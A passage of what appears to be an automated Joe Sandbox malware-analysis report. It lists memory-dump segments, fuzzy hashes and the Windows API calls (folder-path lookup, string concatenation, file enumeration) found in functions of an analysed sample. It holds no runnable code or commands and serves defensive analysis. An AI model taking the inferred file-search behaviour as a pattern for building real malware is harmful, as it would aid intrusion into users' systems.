                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: 0282032562c20e375336e3c1e79c4232a26eae1ee4b4bd54682ca81a53fd6a3c
                                      • Instruction ID: 3e48296acda297816421f05f27733aa28cbf18b678dc07e3c7d0bddc4bdb506c
                                      • Opcode Fuzzy Hash: 0282032562c20e375336e3c1e79c4232a26eae1ee4b4bd54682ca81a53fd6a3c
                                      • Instruction Fuzzy Hash: 5A112AB2904219ABCB14DFC9DD45BBEBBF8FB4CB11F10411AF606A2280D27D5940CBB5
                                      APIs
                                      • __getptd.LIBCMT ref: 0053C74E
                                        • Part of subcall function 0053BF9F: __amsg_exit.LIBCMT ref: 0053BFAF
                                      • __getptd.LIBCMT ref: 0053C765
                                      • __amsg_exit.LIBCMT ref: 0053C773
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0053C797
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: 63703ceff800568f1488e77ec03f7922d4dbc35c04c99f2317d32491932c3fe6
                                      • Instruction ID: edaf29ee9f50685b5c547b441cbe6e6f80d906134043d90e0eac0ed683dc747a
                                      • Opcode Fuzzy Hash: 63703ceff800568f1488e77ec03f7922d4dbc35c04c99f2317d32491932c3fe6
                                      • Instruction Fuzzy Hash: 3FF0BE369047029BE721BBB8980FB9E3FA0BF80724F20414DFA04B72D2DB6469419F56
                                      APIs
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534F7A
                                      • lstrcat.KERNEL32(?,00541070), ref: 00534F97
                                      • lstrcat.KERNEL32(?,00F19A50), ref: 00534FAB
                                      • lstrcat.KERNEL32(?,00541074), ref: 00534FBD
                                        • Part of subcall function 00534910: wsprintfA.USER32 ref: 0053492C
                                        • Part of subcall function 00534910: FindFirstFileA.KERNEL32(?,?), ref: 00534943
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,00540FDC), ref: 00534971
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,00540FE0), ref: 00534987
                                        • Part of subcall function 00534910: FindNextFileA.KERNEL32(000000FF,?), ref: 00534B7D
                                        • Part of subcall function 00534910: FindClose.KERNEL32(000000FF), ref: 00534B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: 4d68c304a26d7ea43a4de60dbe60aacefdc2a60d7bc574e25a96998a5b09425b
                                      • Instruction ID: f351bc6625e183446bfe00554ea38bcaff846762958ad2acfa037009363d7214
                                      • Opcode Fuzzy Hash: 4d68c304a26d7ea43a4de60dbe60aacefdc2a60d7bc574e25a96998a5b09425b
                                      • Instruction Fuzzy Hash: 0321657690030567C754F760EC4AEEE373CBB94300F008554B65BA3181EEB596C88F96